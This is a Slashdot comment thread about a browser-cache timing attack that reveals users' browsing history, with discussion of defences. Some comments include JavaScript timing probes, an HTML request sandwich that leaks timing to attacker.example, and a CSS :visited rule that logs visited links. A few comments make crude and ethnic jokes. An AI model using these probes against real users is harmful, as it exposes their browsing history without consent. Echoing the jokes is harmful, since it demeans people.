Slashdot: News for Nerds

161 comments

Good (-1)

Anonymous Coward | more than 2 years ago | (#38261010)

Good, now they can sniff out my first post

Re:Good (-1)

Anonymous Coward | more than 2 years ago | (#38261092)

Smells like ass. A nose full of rotten eggs with hints of semen and dead animals. 9/10.

Easy work-around (5, Informative)

richkh (534205) | more than 2 years ago | (#38261030)

Fixed cache size of 0.
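
In Firefox this boils down to a couple of about:config prefs; a minimal user.js sketch (pref names as I recall them from that era, so verify them in about:config before relying on this):

user_pref("browser.cache.disk.capacity", 0);      // fixed cache size of 0
user_pref("browser.cache.disk.enable", false);    // disable the disk cache outright
user_pref("browser.cache.memory.enable", false);  // optionally drop the memory cache too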

Re:Easy work-around (5, Insightful)

CastrTroy (595695) | more than 2 years ago | (#38261496)

I do this all the time. My history is disabled by default. Cache is 0. I have never really had a need for history in the past 10 years. If I want to find something again, it's faster to just Google it. Or if I find something that I really don't want to lose, I just bookmark it. No reason to keep a history.

Re:Easy work-around (5, Informative)

icebraining (1313345) | more than 2 years ago | (#38261566)

Cache and history are completely different features. 0 cache means you'll have to download the same CSS/JS/image files over and over again for each page on the same website, which is a waste of resources for both you and the server.

Re:Easy work-around (5, Insightful)

zoloto (586738) | more than 2 years ago | (#38261756)

well, if sites would stop using so much garbage for simple content we wouldn't have this problem now would we?

Re:Easy work-around (3, Informative)

icebraining (1313345) | more than 2 years ago | (#38261838)

There are plenty of cases where actual content - images, videos, etc. - benefits from caching. It's not all garbage.

Re:Easy work-around (1)

RandomAvatar (2487198) | more than 2 years ago | (#38262146)

This depends completely on personal preference, however. Personally, I don't care if I have to re-download everything on a single page, and if it stops people from breaching privacy and gives them a little kick while it's at it, all the better.

Re:Easy work-around (5, Insightful)

icebraining (1313345) | more than 2 years ago | (#38262306)

You might not care, but the guy paying for the server's bandwidth certainly does ;)

Re:Easy work-around (0, Interesting)

Anonymous Coward | more than 2 years ago | (#38263362)

I pay for my ISP's bandwidth. I have to pay a bill each month. Where is it that you can get free ISP access? I pay indirectly for the pages from which I purchase items. It's part of the cost of them doing business.

Of course, if you are suggesting, for example, that the company providing the web page is paying unnecessary bills because of the size of its web pages, it should either improve the content of its web pages or give up on its web presence. The web pages are for the potential customers' benefit, and if I find that they are full of Flash, secondary advertising or other junk then I do not consider that a benefit. I don't think that I should be using a cache just to make their job easier.

Re:Easy work-around (-1)

Anonymous Coward | more than 2 years ago | (#38261902)

Mod parent +1 naive :(

Re:Easy work-around (4, Interesting)

fuzzyfuzzyfungus (1223518) | more than 2 years ago | (#38261886)

Completely different features; but not completely different datasets...

If I'm trying to infer where you've been, a nicely formatted (often with handy metadata, timestamps, etc.) history list sure is handy, if I can get access to it; but it's also an obviously juicy target, and something that browser designers are going to try to keep me away from.

Your cache is a lot messier; but it does provide grounds for inference about where you've been (and thus can retrieve from cache in essentially zero time) and where you haven't recently been (and thus have to burn a few tens to hundreds of milliseconds retrieving from a remote host)... Worse, unlike history (which is really just a convenience feature for the user, and can be totally frozen out of any remotely observable aspect of loading a page; those purple links aren't life or death...) the browser cache is an architectural feature that one cannot remove without sacrificing performance, and one cannot even easily obfuscate without sacrificing performance. It's a much lousier dataset than the history, since history is designed to document where you've been but cache only does that partially and incidentally; but it is one that is harder to get rid of without user-visible sacrifices and increases in network load...
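
To make the inference concrete, here is a minimal sketch of such a timing probe in plain JavaScript; the URL and the 50 ms threshold are made-up placeholders, and a real attack also has to abort on a miss (as discussed further down) so the probe doesn't populate the very cache it is measuring:

function probe(url, thresholdMs, callback) {
  // Time how long a resource the target site would have cached takes to
  // load; a near-instant load suggests it came from the local cache.
  var img = new Image();
  var start = Date.now();
  img.onload = img.onerror = function () {
    callback(Date.now() - start < thresholdMs);
  };
  img.src = url;
}

probe('http://example.com/static/logo.png', 50, function (hit) {
  console.log(hit ? 'probably visited' : 'probably not visited');
});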

Re:Easy work-around (3, Interesting)

icebraining (1313345) | more than 2 years ago | (#38262074)

You wouldn't need to eliminate the cache, just Javascript's ability to measure the load times reliably. For example, you could prevent scripts from reading the state of a particular resource during the first, say, 500 milliseconds after setting its URL, regardless of the source used (cache or network).

Re:Easy work-around (4, Informative)

fuzzyfuzzyfungus (1223518) | more than 2 years ago | (#38262120)

You'd also have to ensure that page elements don't load in any deterministic or controllable order, and that the number of requests the browser has going concurrently isn't predictable: If I can control the order in which your browser loads my page's elements, I can make useful inferences about the load time of a 3rd party resource, without any client javascript, by sandwiching its loading between the loading of two resources (at dynamically generated URLs, to ensure that you couldn't possibly have cached them) on servers I control. Not perfect, because various other factors could affect the time it takes your requests to hit my servers; but likely better than nothing.
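
A rough sketch of that sandwich in plain HTML, assuming the load order has been pinned down as described above; attacker.example stands in for a server the attacker controls, and the token parameters are hypothetical cache-busters. The server infers the middle resource's load time from the gap between the two logged hits:

<!-- Two requests that can never be cache hits, bracketing the probe -->
<img src="http://attacker.example/log?t=1&token=83fa2">
<img src="http://victim-site.example/static/logo.png">
<img src="http://attacker.example/log?t=2&token=83fa2">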

It would also be a bit tricky because inferential attacks wouldn't necessarily have to ask politely for the state of the resource they are interested in; they could instead attempt something else (say a script operation that will fail in a particular way unless the 3rd party resource is available). Barring a solution much cleverer than I can think of, you'd be at considerable risk of having to break progressive loading of pages entirely (or at least into human-visible-and-annoying stuttery chunks) in order to prevent a combination of a page interrogating its own state on the client and correlating it with timestamps on requests to servers controlled by the attacker...

You would think so... (3, Interesting)

pscottdv (676889) | more than 2 years ago | (#38262404)

But according to how this exploit works, they are not "completely different". They, in fact, have a small overlap. Apparently the exploit works by using JavaScript to load a file from a website and seeing how fast it loads. It infers you have been to a website if the file loads quickly.

They seem to have a trick to stop the process just before the browser puts the loaded file into the cache which prevents it from poisoning the very cache it is "testing".

Thus, setting cache to 0, which the OP recommends, and which I have been doing for years, is exactly the fix needed. I admit that I do not know why he also disables history, as that would not help with this exploit.

Re:You would think so... (1)

richkh (534205) | more than 2 years ago | (#38262476)

I'm the OP. I don't disable history. I don't worry about server load either, because my proxy (I run IPCop on a mini-ITX box) does the caching. The server doesn't get bombarded with multiple reloads, and the cache sniffing fails because the files aren't on the machine with the browser.

Re:You would think so... (4, Insightful)

icebraining (1313345) | more than 2 years ago | (#38262520)

The script doesn't actually analyze the cache, just the time it takes to load the resource, so if your proxy's cache is fast enough it might still be detected.

Re:Easy work-around (3, Funny)

Anonymous Coward | more than 2 years ago | (#38263552)

If I want to find something again, it's faster to just Google it. Or if I find something that I really don't want to lose, I just bookmark it. No reason to keep a history.

If your ultimate purpose was more privacy, I find it VERY amusing that you ended up willingly sharing everything with Google, of all parties. :D

Re:Easy work-around (1)

Anonymous Coward | more than 2 years ago | (#38263662)

Yeh. Google it. Because Google doesn't keep tabs on you either?

I don't see the point of disabling cache to keep your history private when it's so likely that Google knows it anyway. People are more likely to repeat a past search query than use the bookmark or history features found in browsers. Just for kicks, set your resolver to 8.8.8.8 and pretend no one is watching that either.

Pretend your ISP would never do it either.

Pretend that Facebook button on every page in existence is a convenience thing just for you.

The only reason you'd need to sniff my browser cache is because you're sucking at the Internet. Those that don't suck... they have your history already.

Privacy on the Internet is a thing of the past.

Re:Easy work-around (0)

Anonymous Coward | more than 2 years ago | (#38262542)

*grin*

As long as you enable Flash or Silverlight, I can do the same thing without Javascript.
And if I become really obtrusive, I think I can also get your history with pure HTML, but that would require much more analysis on my side and is not as accurate as doing it directly. As long as you enable JavaScript/Flash/Silverlight or have caching enabled, I can see what you've been doing.

But in order not to further scare you: if you turn off JavaScript, 80% of the connecting ad networks won't load any ads (or their profiling stuff),
and if you turn off both your scripting and caching, I won't be able to profile much besides your visits to sites running within our ad network.

Re:Easy work-around (1)

Freshly Exhumed (105597) | more than 2 years ago | (#38262780)

Yep, but first install a Squid proxy on an internet-facing machine and set all internal browsers to proxy through it; then set all browsers to use a cache size of 0.
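
For reference, a minimal squid.conf sketch for that setup; the LAN range, cache size, and paths are placeholders to adapt:

http_port 3128                              # browsers point their proxy setting here
cache_dir ufs /var/spool/squid 1024 16 256  # on-disk cache lives on the proxy box
acl lan src 192.168.0.0/24                  # placeholder: your internal network
http_access allow lan
http_access deny all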

Re:Easy work-around (3, Informative)

Anonymous Coward | more than 2 years ago | (#38262992)

If I correctly understand how this attack works, they could easily read your proxy cache the same way.

Re:Easy work-around (0)

Anonymous Coward | more than 2 years ago | (#38263762)

Fixed cache size of 0.

It seems to be working with cache size set to 0, at least for the current session.

Unreliable (3, Informative)

cpicon92 (1157705) | more than 2 years ago | (#38261048)

This tool seems unreliable (at least in Chrome). I've been on YouTube five times in the past 48 hours and it still showed up grey on the sniffer.

Re:Unreliable (0)

Anonymous Coward | more than 2 years ago | (#38261066)

I'm not sure why anyone cares about this tool - on Firefox, which I don't use at all, it thinks I've visited numerous sites. On Chrome, which I do, it thinks I've visited nothing. So far, I have no reason to believe it's at all accurate.

Re:Unreliable (2, Funny)

Anonymous Coward | more than 2 years ago | (#38261228)

This tool seems unreliable (at least in Chrome). I've been on YouTube five times in the past 48 hours and it still showed up grey on the sniffer.

Most likely an OS/Vendor issue.

If you're using a Mac, pretty much every sniffer tool will show up ghey.

Re:Unreliable (1)

Hentes (2461350) | more than 2 years ago | (#38261306)

Yeah, it's too inaccurate to be convincing. A random algorithm weighted on popularity could have a similar success rate. Maybe if the number of tested sites were increased it would be clearer whether it works or not.

Re:Unreliable (1, Troll)

Ethanol-fueled (1125189) | more than 2 years ago | (#38261542)

I use Firefox with NoScript, instructing the browser to clear everything when it closes. I made a NoScript exception and tried the tool, and it failed to detect anything except Lowe's! I have never visited the Lowe's website, and I have never shopped there*!

* Home Depot is where it's at, especially for cheap Mexicans!

Re:Unreliable (3, Funny)

PopeRatzo (965947) | more than 2 years ago | (#38261824)

Home Depot is where it's at, especially for cheap Mexicans!

That's great news. The Mexicans at Lowe's are really overpriced.

I've got a million of 'em (0, Troll)

PopeRatzo (965947) | more than 2 years ago | (#38261856)

Home Depot is where it's at, especially for cheap Mexicans!

That's great news. The Mexicans at Lowe's are really overpriced.

I just looked at the Home Depot sale paper, and they've got Mexicans on sale. Buy 1, get 18 free.

Not surprising (1, Insightful)

Anonymous Coward | more than 2 years ago | (#38261062)

Browser developers are not doing proper development anymore. They are too busy playing stupid games like hiding http://, removing status bars, inflating the version numbers and breaking your extensions to do things like security or proper memory management.

Hard to block this (4, Interesting)

rlk (1089) | more than 2 years ago | (#38261844)

This kind of timing attack isn't easy to block.

Some kinds of timing attacks are. I think I heard once that a timing attack could be made against passwords in TOPS-20, because the passwords were stored in plaintext and compared one character at a time. The trick was to do the system call to check the password (or whatever it was) with the guess split across a page boundary (maybe the second page was forced out of memory or something). Since the system call would return as soon as one character didn't match, it was easy to see if the next character being guessed was correct or not. The fix was simple enough. Obviously there was a bit more to it than that, but I only heard this apocryphally as it was, and at that probably about 25 years ago.

This kind of thing is harder to fix, since it depends upon the difference between cache and non-cache access time, and the non-cached access time is not deterministic. It would be possible for the browser to introduce an artificial delay into the appropriate JavaScript calls, but that would make performance go down the tubes.

In any event, I tried it and the results didn't look very accurate (the first time, all of the sites it tried claimed that I had hit them; the second time it claimed only one site was in cache, and after that it thought that nothing was).

Re:Hard to block this (0)

Anonymous Coward | more than 2 years ago | (#38263540)

This kind of timing attack isn't easy to block.

Some kinds of timing attacks are. I think I heard once that a timing attack could be made against passwords in TOPS-20, because the passwords were stored in plaintext and compared one character at a time. The trick was to do the system call to check the password (or whatever it was) with the guess split across a page boundary (maybe the second page was forced out of memory or something). Since the system call would return as soon as one character didn't match, it was easy to see if the next character being guessed was correct or not. The fix was simple enough. Obviously there was a bit more to it than that, but I only heard this apocryphally as it was, and at that probably about 25 years ago.

I think in this system the statistics about page faults were available to the application, and it could use that information directly in the attack. On the other hand, your way would probably have worked as well.

Javascript required? (5, Informative)

betterunixthanunix (980855) | more than 2 years ago | (#38261094)

This appears to require Javascript. Thank you, noscript.

Re:Javascript required? (5, Insightful)

danbuter (2019760) | more than 2 years ago | (#38261298)

NoScript should just be added in as part of default Firefox. It's very easy to manage, and saves me lots of headaches.

Re:Javascript required? (-1)

Anonymous Coward | more than 2 years ago | (#38261338)

I'm suggesting that my bank and my VOIP provider are unlikely to be either injecting malware onto my machine or sniffing my browsing history through such javascript exploits, while random unknown web sites are more likely to do so.

Are YOU suggesting that all sites on the internet are equally trustworthy in those regards? Ha ha ha oh wow.

And most of the reputable sites that track you do so through 3rd party services like google analytics that you don't have to run to use the main site.

Please, learn a little, *then* come here and argue.

Re:Javascript required? (0)

Anonymous Coward | more than 2 years ago | (#38261362)

Sorry, meant that for a different subthread.

Re:Javascript required? (0)

Anonymous Coward | more than 2 years ago | (#38261426)

You're making the right argument for the wrong reasons.

NoScript is a pain in the ass -- however easy to manage it is, you do have to manage it. And it can cause new headaches if you forget that it's there.

It is, however, almost unquestionably a security benefit, and NoScript does let you trust different sites to different degrees. Your point about Google Analytics is completely self-defeating because it points out a common case where NoScript doesn't hurt at all.

I feel like you're just spouting canned arguments.

Suggest NoScript implement a whitelist loader (3, Interesting)

Hyperhaplo (575219) | more than 2 years ago | (#38262122)

Perhaps you are both right.

Let's start with the idea that NoScript by default is enabled.

Let's continue with the notion that application management should be as minimal as possible.

I give firewall software as a good example. If it is not easy to do one of the following, then the software (in my opinion, for me) fails:
1) Monitor all software incoming / outgoing. Block anything not on the whitelist, log connections, provide an interface in the *background* for the user to allow or deny in the future as Rules

2) Monitor all software incoming / outgoing. Allow all by default, log all connections, provide an interface for the user to allow or deny in the future as Rules

NoScript does most of this already. What it lacks is a reliable whitelist, similar to that used by Ghostery or AdBlock Plus, which loads the user up with 99% of the Rules they need.

I agree with your comment. For most users, you can whitelist all major bank sites - knowing that 99% of the time the sites are fine.
If the user disagrees then they can modify this setting.
Add onto that list a whole bunch of sites where the root site should be able to be trusted; news sites - slashdot, news.com, guardian, age, newspapers, etc.
Build onto that well-known commercial sites.

Make this list auto-update once per month, but not override user-set preferences.

There you go. A tool very similar in nature to Adblock Plus and Ghostery which upon startup has a configuration to protect users and supply 99% of the functionality needed.

If this was the case, then I would put this on lots of people's PCs, knowing that if there are issues then they can be dealt with.

Although, at the moment, Ghostery + AdBlock Plus on Firefox provide most of the protection needed in a usable, safe and coherent manner.

Re:Javascript required? (1)

inzy (1095415) | more than 2 years ago | (#38261400)

...and it confuses the hell out of a lot of people who don't understand what javascript is. "I just want to see the webpage"

Rather than trying to get people using what is frankly an arcane and imprecise tool, we would be better off removing the incentive which makes data theft valuable. This then becomes an economic and social problem rather than a technical one. There are few situations where the former can be solved well with the latter.

Re:Javascript required? (0)

Anonymous Coward | more than 2 years ago | (#38261748)

That is why I install NoScript on people's computers and then leave it set to globally enabled. NoScript provides a lot of protection, even with Javascript allowed. Not ideal, but better than nothing.

Re:Javascript required? (1)

hedwards (940851) | more than 2 years ago | (#38262380)

I ended up replacing it with RequestPolicy, as half the time I had to enable all the JavaScript just to get the page to load anyway. I mostly just wish it provided a method of blacklisting things like Facebook that never add any value to the site.

Re:Javascript required? (3, Interesting)

bussdriver (620565) | more than 2 years ago | (#38261840)

YES! I 2nd that! But it should be better integrated and off by default -- they can try to hint users into using it by other means. I have NoScript set to allow by default just because I was sick of whitelisting everything; but any site I feel bad about I blacklist. It's not as secure, but it is doing something. Add a subscription list like AdBlock has and it wouldn't be so bad for people who want to help compile black and white lists. Normal users would get a blacklist with it always on by default, and others who know better will know enough to flip the policy. The paranoid would turn off the subscription lists and do it all themselves.

I would like a power-user area to block certain DOM features completely. I do not trust canvas or most of the newer DOM features by default; it should ask me to OK those when a site tries to use them. (The lists mentioned above could specify what is white- or blacklisted, not just whole domains, etc.) Actually, I'm wary of CSS3 fonts because font rendering engines haven't been a focus of security, and 3D drivers... you are lucky to have stable, fast 3D; security? Currently a pipe dream.

A DOM js access list by domain would be a lot like a sandbox system for websites.

Re:Javascript required? (3, Informative)

TubeSteak (669689) | more than 2 years ago | (#38261986)

It's very easy to manage

I've installed NoScript for non-technical people and it almost immediately caused them headaches.
There are plenty of internal academic/work websites that rely on fetching scripts from third parties...
Which is exactly what NoScript is designed to prevent.

And then there are endless websites that want you to allow scripts from a CDN or Google APIs or social bookmarking.
NoScript's generic default allows aren't inclusive enough to keep websites from breaking for most people.

Re:Javascript required? (2)

hedwards (940851) | more than 2 years ago | (#38262414)

I've noticed that. When I'm using NoScript I tend to spend most of my time enabling things on sites, as oftentimes I can't even see the site. I've found that RequestPolicy is a lot easier to use in many ways, but it unfortunately lacks any sort of blacklist, so you're limited in what you can do as far as blocking portions of a site's JavaScript collection.

Re:Javascript required? (3, Insightful)

Arker (91948) | more than 2 years ago | (#38262678)

And this won't stop as long as most people are stupid enough to accept browsers that will just run whatever random script some random website hands them. Unfortunately, it's a bit of a chicken-and-egg problem in that way. If the major browsers would behave sanely, these insanely bad web practices wouldn't work, and the insanely bad 'web designers' that come up with them would have to learn to write real web pages or find another line of work. As is, too many people don't know and don't want to know, and we all pay the price in one way or another.

I'll keep my NoScript and be happy that broken pages actually display as broken for me, so I know to avoid them, rather than having my browser just randomly download and execute whatever crap code the broken web page needs to make it look like something else.

Re:Javascript required? (0)

Anonymous Coward | more than 2 years ago | (#38262224)

NoScript is the conspiracy theory of the crap blockers.
It's essentially pointless, because the big sites all require JavaScript, and those sites are usually the ones where shit like this happens.

The only thing it's effective at is having a worse browsing experience, with less functionality and a slower pace. Or, in case you enable JavaScript for big sites: living in false security.

Why don't you also disable pictures... or font rendering... or all graphics for that matter? It would "save you lots of headaches" too, whatever that, in the context of it saving you from nothing, means.

Stupid, stupid, stupid.

Re:Javascript required? (1)

swillden (191260) | more than 2 years ago | (#38261554)

This appears to require Javascript. Thank you, noscript.

It doesn't, really. This proof of concept is implemented using Javascript, because it's easier, but the basic concept doesn't require Javascript to work.

Re:Javascript required? (2)

icebraining (1313345) | more than 2 years ago | (#38261646)

How do you observe download timings without Javascript?

Re:Javascript required? (1)

larry bagina (561269) | more than 2 years ago | (#38262012)

Java (mentioned in the paper) or possibly Flash.

Re:Javascript required? (3, Informative)

icebraining (1313345) | more than 2 years ago | (#38262086)

Oh, ok, but NoScript blocks those too, so betterunixthanunix's point still stands.

Re:Javascript required? (2)

swillden (191260) | more than 2 years ago | (#38262584)

Sandwich them between requests to a real server, which you control. Network latency jitter would make the attack less reliable, but I'll bet it would still work reasonably well. Better if you have a low-latency path to the target. ISPs could probably implement it with very high reliability.

Re:Javascript required? (1)

icebraining (1313345) | more than 2 years ago | (#38262716)

How does that work considering that most browsers download resources in parallel (even if they actually load them to the page in order), particularly from different domains?

Re:Javascript required? (1)

godel_56 (1287256) | more than 2 years ago | (#38263700)

This appears to require Javascript. Thank you, noscript.

From the last line in TFA, "If you are using NoScript or other privacy tools, the test will fail even if you whitelist this site."

Thank you, NoScript.

BTW, If you use NoScript, send the author a few bucks. I'll bet very few actually do.

convincing implementation (4, Interesting)

cachimaster (127194) | more than 2 years ago | (#38261098)

The theory isn't new, but a convincing implementation is.

Convincing to whom? To you?

ACM [acm.org] was quite convinced back in 2000 when they published the paper.

They obviously implemented it because it contains a lot of measurements.

Re:convincing implementation (1)

osu-neko (2604) | more than 2 years ago | (#38261350)

The theory isn't new, but a convincing implementation is.

Convincing to whom? To you?

ACM [acm.org] was quite convinced back in 2000 when they published the paper.

They obviously implemented it because it contains a lot of measurements.

Convincing to browser developers, obviously, who moved to fix the other problems fairly quickly but have, to date, done nothing about this one.

And obviously, yes, they implemented a method for doing this back in 2000 for that paper. It's what's being referred to when the author notes, "Such attacks were historically regarded as fairly impractical, slow, and noisy - and perhaps more importantly, one-shot." What we have now, though, is a method that is fast, practical, and nondestructive.

Re:convincing implementation (2)

Hentes (2461350) | more than 2 years ago | (#38261546)

Convincing to browser developers, obviously, who moved to fix the other problems fairly quickly but have, to date, done nothing about this one.

Are you kidding me? The CSS visited link vulnerability took ages to get fixed.

What we have now, though, is a method that is fast, practical, and nondestructive.

It's too inaccurate to be practical. Try it.

but you have to run their software to do it... (0)

Anonymous Coward | more than 2 years ago | (#38261114)

I just tried, and it came up empty: nothing happened when I pushed the button.

I suspect this is YET ANOTHER case where it only works if you voluntarily run their software. And who, anymore, is dumb enough to run random javascript from random web sites you don't trust? Whitelist the stuff you want, and leave the rest alone. Would you let random strangers into your house, too? No, you'd let your friends in, and not that drug gang down the street.

So, yeah, amazingly enough, if you run somebody's software on your machine, their software runs on your machine. Trivial fix: don't do that shit.

Re:but you have to run their software to do it... (4, Informative)

lattyware (934246) | more than 2 years ago | (#38261150)

Reality: Only a small number of users use NoScript et al. This is a problem for those that don't, and even if you do, what about when a site you want something from requires JS?

jacked or tracked: it's your choice (1)

Anonymous Coward | more than 2 years ago | (#38261238)

If it's a reputable site - my bank, my VOIP provider, even the main domain for youtube or something - sure, run the software. But random scripts from weird sites? You have to be a few cards short of a full deck to trust random shit from the internet. It's the damn *internet*. Anyone can do anything on it, so it only takes about three functional neurons to realize that you should use a bit of caution. Even if you don't get jacked, you'll get tracked!

Re:jacked or tracked: it's your choice (0)

lattyware (934246) | more than 2 years ago | (#38261258)

Are you suggesting that your bank, VOIP provider, and youtube have no interest in tracking you?
Ha ha ha oh wow.

Re:jacked or tracked: it's your choice (0)

Anonymous Coward | more than 2 years ago | (#38261354)

(Sorry, got this in the wrong thread before)

I'm suggesting that my bank and my VOIP provider are unlikely to be either injecting malware onto my machine or sniffing my browsing history through such javascript exploits, while random unknown web sites are more likely to do so.

Are YOU suggesting that all sites on the internet are equally trustworthy in those regards? Ha ha ha oh wow.

And most of the reputable sites that track you do so through 3rd party services like google analytics that you don't have to run to use the main site.

Please, learn a little, then come back and argue.

Re:jacked or tracked: it's your choice (5, Interesting)

CapOblivious2010 (1731402) | more than 2 years ago | (#38261604)

I've only gotten one internet virus in my life - via the "executable GIF" exploit, from visiting NVIDIA.COM !!!

If you think "reputable" means "safe", YOU'RE a few cards short of a full deck!

Re:jacked or tracked: it's your choice (2, Funny)

icebraining (1313345) | more than 2 years ago | (#38261656)

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind.'

Re:jacked or tracked: it's your choice (1, Offtopic)

uufnord (999299) | more than 2 years ago | (#38261776)

OMG THAT IS SO THOUGHT-PROVOKING!!!11!!111!11

What did he say about unattributed quotes and unreferenced personal pronouns?

Re:jacked or tracked: it's your choice (1)

PNutts (199112) | more than 2 years ago | (#38261972)

A guy I work with has been compromised twice: Once on his work PC visiting Drudge Report. The other was on his home PC while he was... err... never mind. Let's just say he's only been compromised once from a non-adult website and leave it at that.

Re:jacked or tracked: it's your choice (1)

wvmarle (1070040) | more than 2 years ago | (#38262530)

And that is exactly why these scripts are run in a browser, and not directly on your desktop.

One of the tasks of a web browser is to provide a script jail, where scripts can run safely, and where they can access the resources they need but nothing more. You are downloading stuff from the Internet to display - that's how web browsing works, of course. And that is why I want to be able to trust my browser to do everything it can to prevent these scripts from breaking out of their jail, and from accessing information they have no right to. So far at least Firefox is doing a pretty decent job of that, and I have put my trust in that browser.

Also, I'm glad to read about this kind of attack. I'm not surprised it can be done; there will always be leaks. Though it appears to be rather hard to do, and I hope Mozilla and their competitors will read this too and implement some feature that thwarts this type of attack, keeping the rest of us safe.

Re:but you have to run their software to do it... (0)

Anonymous Coward | more than 2 years ago | (#38261160)

A lot of users still click "Yes" and "Ok" when it shows up.

without javascript (4, Interesting)

Anonymous Coward | more than 2 years ago | (#38261166)

They say it can work without javascript, but I do not believe that. None of the samples work without javascript. In the paper, it says:

We omit the straightforward but tedious details of how to write HTML that causes popular browsers to make serialized accesses to files.

Can anyone provide this tedious, but allegedly straightforward, and extremely critical detail?

Re:without javascript (1)

Anonymous Coward | more than 2 years ago | (#38261282)

HTML is typically rendered in the order that it is read, therefore it's possible to know that A is requested before B, etc.
With that in mind, you can sandwich your request to Twitter between two dummy requests to a server that you control.
The server compares the timing on the dummy requests and can guess the timing for the real one.

Re:without javascript (2)

Bogtha (906264) | more than 2 years ago | (#38261806)

There's a little more to it than that. Browsers open multiple connections in parallel. Historically, this was limited by the HTTP specification to two simultaneous connections, but recent versions of browsers have increased this limit. You'd have to detect how many simultaneous connections were in use (or hack it by detecting the browser) and make requests to enough tarpits to bog down all but one of the connections. It would probably be fairly reliable, but the work to build that just to demonstrate the flaw in a different way doesn't seem worth it.

There are places where serial access is more well-defined, though. Off the top of my head, the only one I can think of is downloading external scripts (because you can't know ahead of time which of them will call document.write()), but they may be thinking of another case that will apply even when scripts aren't being downloaded.

Re:without javascript (1)

Anonymous Coward | more than 2 years ago | (#38261488)

Wow, I was wondering the same thing, then I found this -

http://whattheinternetknowsaboutyou.com/docs/details.html [whattheint...outyou.com]

Skip down to the CSS section:

<style>
        a#link1:visited { background-image: url(/log?link1_was_visited); }
        a#link2:visited { background-image: url(/log?link2_was_visited); }
</style>
<a href="http://google.com" id="link1">
<a href="http://yahoo.com" id="link2">

The background-image is only loaded on the visited state...

Re:without javascript (3, Informative)

Hentes (2461350) | more than 2 years ago | (#38261574)

This is already fixed in most browsers; you need to update/reconfigure yours.

I call shenanigans (1)

gVibe (997166) | more than 2 years ago | (#38261250)

What a load of crap this supposed new tool is. For one...I never go to Facebook, and rarely go to Youtube, and most certainly have never visited Ebay on this machine. I currently use Chrome over most, but have IE and FF installed in case for some reason I need to test a website's browser support. Not sure who the users are that give feedback saying the FF port of the tool for Chrome is working...but I suspect those users wouldn't know their hand from their ass in most cases.

How (5, Informative)

farnsworth (558449) | more than 2 years ago | (#38261314)

This seems to work by loading well-known resources into an iframe and using a heuristic on the "time to load" to tell whether it's cached or not - hence, whether or not you have visited that site. I just scanned the source code, but this is what it looks like. In any case, it's not like this code reveals your history -- just whether or not your browser has visited one in a set of popular sites.

Yay stateless web.

Fix: add a random delay for reporting time to load (1)

bigtrike (904535) | more than 2 years ago | (#38261726)

It seems like you could add a random delay of up to a couple hundred milliseconds before the browser reports that an iframe has successfully loaded, making it harder to tell by the timing.
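
Purely as illustration - this logic would live inside the browser, not in page script, and the function names here are hypothetical - the proposal amounts to something like:

// Hypothetical browser-internal hook: fire the iframe's load event only
// after a random 0-200 ms delay, so timing no longer cleanly separates
// cache hits from misses.
function reportFrameLoaded(frame, fireLoadEvent) {
  var jitterMs = Math.random() * 200;
  setTimeout(function () { fireLoadEvent(frame); }, jitterMs);
}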

Re:Fix: add a random delay for reporting time to l (2)

Korin43 (881732) | more than 2 years ago | (#38261754)

Except that would make JavaScript slower, which is the exact opposite of what the browser makers are going for.

Re:Fix: add a random delay for reporting time to l (1)

bigtrike (904535) | more than 2 years ago | (#38261906)

Yes, it definitely would. You could certainly limit the scope to only apply to cross domain queries for out of viewport/small/hidden iframes, but that still might cause slowness issues for legitimate uses.

Re:Fix: add a random delay for reporting time to l (0)

Anonymous Coward | more than 2 years ago | (#38262496)

It's not just that. What about an img tag, for example? With JavaScript, you can query the position of the elements below the img (unrelated to the img itself). When they've been pushed down, you know the image has loaded, without ever actually dealing with the particular img tag.
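
A sketch of that layout side channel (the image URL is a placeholder): watch a marker element below the image instead of the image itself.

// Once the image decodes it gains height and pushes the marker down;
// no load event on the img is ever consulted.
var img = document.createElement('img');
img.src = 'http://victim-site.example/static/logo.png'; // placeholder
var marker = document.createElement('div');
document.body.insertBefore(marker, document.body.firstChild);
document.body.insertBefore(img, marker);
var initialTop = marker.offsetTop;
var start = Date.now();
var poll = setInterval(function () {
  if (marker.offsetTop !== initialTop) { // marker moved => image loaded
    clearInterval(poll);
    console.log('image loaded after ' + (Date.now() - start) + ' ms');
  }
}, 5);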

Re:How (1)

mapkinase (958129) | more than 2 years ago | (#38261940)

1/ actually read the article
2/ post cliff notes about it
3/ points

Works like a charm.

Now on topic: I clicked and it shows nothing because of my OCD: Ctrl-Shift-Del, Enter.

Private Browsing mode FTW! (3, Insightful)

pla (258480) | more than 2 years ago | (#38261342)

Subject says it all. I don't worry about cookies, cache, or malicious scripts (other than wastes-of-bandwidth) because every time I open Firefox, it looks shiny and new to the outside world.

When I visit a "sensitive" site, like my bank, I open a new browser session and close it when I finish. Aside from that, I just don't worry about it, and have never had a problem. Hell, even that great data-mining wizard Google - my home page and probably the single most frequent site I hit - always defaults me to Georgia (presumably the location of my ISP's HQ), missing by over a thousand miles.

Easy enough (4, Interesting)

Baloroth (2370816) | more than 2 years ago | (#38261374)

Tried the test for Opera, and it mostly worked (missed Newegg). Tried it in a private tab; didn't work at all. So, any site you don't want tracking you, you load in a private tab. Which you should anyways.

Out of curiosity, I also tried the FF test (in Opera, still) and the IE test. The IE test worked, better even than the dedicated test, while the FF test failed utterly. Curious.

And of course, as always, this test only works for the specific sites you test for, not generally. But that isn't surprising. It wasn't terribly fast, either; I'd certainly notice if you tested for hundreds or thousands of sites.

Multiple tests give conflicting results (0)

Anonymous Coward | more than 2 years ago | (#38261430)

By running the test repeatedly Chrome started showing pages I had never visited as being visited.

Re:Multiple tests give conflicting results (3, Informative)

icebraining (1313345) | more than 2 years ago | (#38261630)

That's because the test consists of downloading a file and measuring whether it was instantaneous (cached) or not. Of course, the second time you run it, the script itself will have downloaded (and therefore put in cache) the same file, tricking itself.

Re:Multiple tests give conflicting results (1)

xstonedogx (814876) | more than 2 years ago | (#38263710)

It is meant to be non-destructive to the cache.

In all browsers, we can reliably abort the underlying request by changing the src= parameter of the frame as soon as we have a reasonable suspicion we're dealing with a cache miss.

In other words, they don't actually download the files. They request the files to see if the browser starts parsing them within a certain time frame (indicating a cached document). Regardless, they abort the request after that time limit and the document is never cached.
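
A sketch of that probe-and-abort in JavaScript; the 10 ms window and the URL are placeholders (real tools would tune the threshold per browser):

// Probe a document and abort on a suspected cache miss, so the probe
// itself never populates the cache it is measuring.
var frame = document.createElement('iframe');
frame.style.display = 'none';
document.body.appendChild(frame);
var loaded = false;
frame.onload = function () { loaded = true; };
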